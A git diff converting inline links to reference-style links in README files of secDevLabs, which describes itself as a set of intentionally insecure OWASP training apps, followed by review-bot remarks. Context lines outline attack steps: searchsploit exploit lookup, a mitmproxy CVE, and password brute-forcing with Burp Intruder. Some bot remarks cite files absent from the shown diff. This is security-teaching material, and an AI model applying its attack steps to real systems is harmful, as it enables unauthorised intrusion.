diff --git a/owasp-top10-2021-apps/a6/cimentech/README.md b/owasp-top10-2021-apps/a6/cimentech/README.md index a888c91c9..d19b63045 100644 --- a/owasp-top10-2021-apps/a6/cimentech/README.md +++ b/owasp-top10-2021-apps/a6/cimentech/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Vulnerable and Outdated Components ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a6/cimentech @@ -65,7 +65,7 @@ Having the CMS version, it's possible to check on [exploit-db][3] if there are a -By using [searchsploit](https://www.exploit-db.com/searchsploit), an attacker could also find this same result via a terminal. To install it, simply type the following in your OSX terminal (keep in mind it might trigger your anti-virus software) : +By using [searchsploit][searchsploit], an attacker could also find this same result via a terminal. To install it, simply type the following in your OSX terminal (keep in mind it might trigger your anti-virus software) : ```sh ⚠️ 'The next command will install several exploit codes in your system and many of them may trigger antiviruses alerts' 
@@ -125,6 +125,8 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs +[searchsploit]: https://www.exploit-db.com/searchsploit [app]: http://localhost:80 [secdevlabs]: https://github.com/globocom/secDevLabs [1]: https://www.ruby-lang.org/en/documentation/installation/ diff --git a/owasp-top10-2021-apps/a6/golden-hat/README.md b/owasp-top10-2021-apps/a6/golden-hat/README.md index 4b66e20c9..8ad8ef917 100644 --- a/owasp-top10-2021-apps/a6/golden-hat/README.md +++ b/owasp-top10-2021-apps/a6/golden-hat/README.md @@ -67,7 +67,7 @@ Once we try reaching the `/golden.secret` we can see interesting headers: As we can see this `Via: mitmproxy/5.3.0` helps us with the recon. Now that we know what is running on the server we can search for CVEs on this version of mitmproxy. Once we found the CVE-2021-39214, we can make an exploit to this vulnerability. -Let's take a look on the mitmproxy source code, [TAG 5.3.0](https://github.com/mitmproxy/mitmproxy/tree/v5.3.0) at file [/mitmproxy/net/http/http1/read.py:L209](https://github.com/mitmproxy/mitmproxy/blob/a738b335a36b58f2b30741d76d9fe41866309299/mitmproxy/net/http/http1/read.py#L209): +Let's take a look on the mitmproxy source code, [TAG 5.3.0][TAG 5.3.0] at file [/mitmproxy/net/http/http1/read.py:L209][/mitmproxy/net/http/http1/read.py:L209]: ```python if "chunked" in headers.get("transfer-encoding", "").lower(): @@ -122,3 +122,5 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:10006 +[TAG 5.3.0]: https://github.com/mitmproxy/mitmproxy/tree/v5.3.0 +[/mitmproxy/net/http/http1/read.py:L209]: https://github.com/mitmproxy/mitmproxy/blob/a738b335a36b58f2b30741d76d9fe41866309299/mitmproxy/net/http/http1/read.py#L209 
diff --git a/owasp-top10-2021-apps/a7/insecure-go-project/README.md b/owasp-top10-2021-apps/a7/insecure-go-project/README.md index 49c200e69..dca300447 100644 --- a/owasp-top10-2021-apps/a7/insecure-go-project/README.md +++ b/owasp-top10-2021-apps/a7/insecure-go-project/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Identity and Authentication Failur ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a7/insecure-go-project @@ -79,5 +79,6 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:10002 [dirb]: https://tools.kali.org/web-applications/dirb diff --git a/owasp-top10-2021-apps/a7/saidajaula-monster/README.md b/owasp-top10-2021-apps/a7/saidajaula-monster/README.md index 4240f4b48..ac8d379d1 100644 --- a/owasp-top10-2021-apps/a7/saidajaula-monster/README.md +++ b/owasp-top10-2021-apps/a7/saidajaula-monster/README.md 
@@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Identity and Authentication Failur ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a7/saidajaula-monster @@ -140,5 +140,6 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:10002 [dirb]: https://tools.kali.org/web-applications/dirb diff --git a/owasp-top10-2021-apps/a8/amarelo-designs/README.md b/owasp-top10-2021-apps/a8/amarelo-designs/README.md index cbacc5052..f4fa20615 100644 --- a/owasp-top10-2021-apps/a8/amarelo-designs/README.md +++ b/owasp-top10-2021-apps/a8/amarelo-designs/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Software and Data Integrity Failur ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a8/amarelo-designs 
@@ -163,6 +163,7 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:10008 [secdevlabs]: https://github.com/globocom/secDevLabs [2]: https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2021-apps/a8/amarelo-designs diff --git a/owasp-top10-2021-apps/a9/games-irados/README.md b/owasp-top10-2021-apps/a9/games-irados/README.md index dbef5d09a..e049cdfd9 100644 --- a/owasp-top10-2021-apps/a9/games-irados/README.md +++ b/owasp-top10-2021-apps/a9/games-irados/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Security Logging and Monitoring Fa ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a9/games-irados 
@@ -64,7 +64,7 @@ Initially, we begin the first attack by sending an intentionally wrong login att ## 🔥 -After that, an attacker could use [Burp Suite] as a proxy to send as many requests as needed until a valid password is found (if you need any help setting up your proxy, you should check this [guide](https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp)). To do so, after finding the login POST request, right click and send to `Intruder`, as shown below: +After that, an attacker could use [Burp Suite] as a proxy to send as many requests as needed until a valid password is found (if you need any help setting up your proxy, you should check this [guide][guide]). To do so, after finding the login POST request, right click and send to `Intruder`, as shown below:

@@ -170,7 +170,10 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ +[secDevLabs]: https://github.com/globocom/secDevLabs [app]: http://localhost:10010 [secdevlabs]: https://github.com/globocom/secDevLabs [2]: https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2021-apps/a9/games-irados [burp suite]: https://portswigger.net/burp +[guide]: https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp +
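Review bot: the rewritten Burp Suite sentence in `owasp-top10-2021-apps/a5/vinijr-blog/README.md` (hunk `@@ -54,11 +54,11 @@`) loses its closing parenthesis: the removed line ends `[guide](...)):` while the added line ends `[guide][guide]:`, so the parenthetical `(if you need any help setting up your proxy ...` is never closed. Suggest `... you should check this [guide][guide]):`.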
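Review bot: the last added line of `vinijr-blog/README.md` (hunk `@@ -121,4 +121,9 @@`), `[ENTITIES]: https://www.w3schools.com/xml/xml_dtd_entities.asp`, is marked `\ No newline at end of file`; please end the file with a newline so the next change to that file does not show a spurious diff on this line.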
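Review bot: the added `[secDevLabs]: https://github.com/globocom/secDevLabs` definition in `a6/cimentech/README.md` (hunk `@@ -125,6 +125,8 @@`), `a8/amarelo-designs/README.md` (hunk `@@ -163,6 +163,7 @@`) and `a9/games-irados/README.md` (hunk `@@ -170,7 +170,10 @@`) sits next to an existing `[secdevlabs]: https://github.com/globocom/secDevLabs` line. Markdown reference labels are case-insensitive, so the second definition is redundant and linters that check for duplicate definitions will flag it; either drop the new line and reuse the existing label, or replace the old one so each file carries a single definition.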
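Review bot: the new label `[/mitmproxy/net/http/http1/read.py:L209]` in `a6/golden-hat/README.md` (hunk `@@ -67,7 +67,7 @@` and `@@ -122,3 +122,5 @@`) has to be typed identically in the text and in the definition, so any edit to the visible path breaks the link. A short label with the path kept as link text, e.g. `[/mitmproxy/net/http/http1/read.py:L209][read.py L209]` and `[read.py L209]: https://github.com/mitmproxy/mitmproxy/blob/a738b335a36b58f2b30741d76d9fe41866309299/mitmproxy/net/http/http1/read.py#L209`, keeps the definition stable; the same applies to `[TAG 5.3.0]`.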
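Review bot: the final `+` line in `a9/games-irados/README.md` (hunk `@@ -170,7 +170,10 @@`) adds an empty line after the `[guide]` definition, leaving a trailing blank line at the end of the file; drop it so the file ends with a single newline.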
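Review bot: `[Burp Suite][Burp Suite]` in `m2/cool_games/README.md` (hunk `@@ -69,7 +69,7 @@`) repeats the label, while `games-irados/README.md` (hunk `@@ -64,7 +64,7 @@`) uses the shortcut form `[Burp Suite]`, which resolves against the same definition and matches how `[wordlist]` is already written. Worth settling on one form across the PR; the same goes for `[guide][guide]`, `[curl][curl]`, `[ENTITIES][ENTITIES]` and `[searchsploit][searchsploit]`.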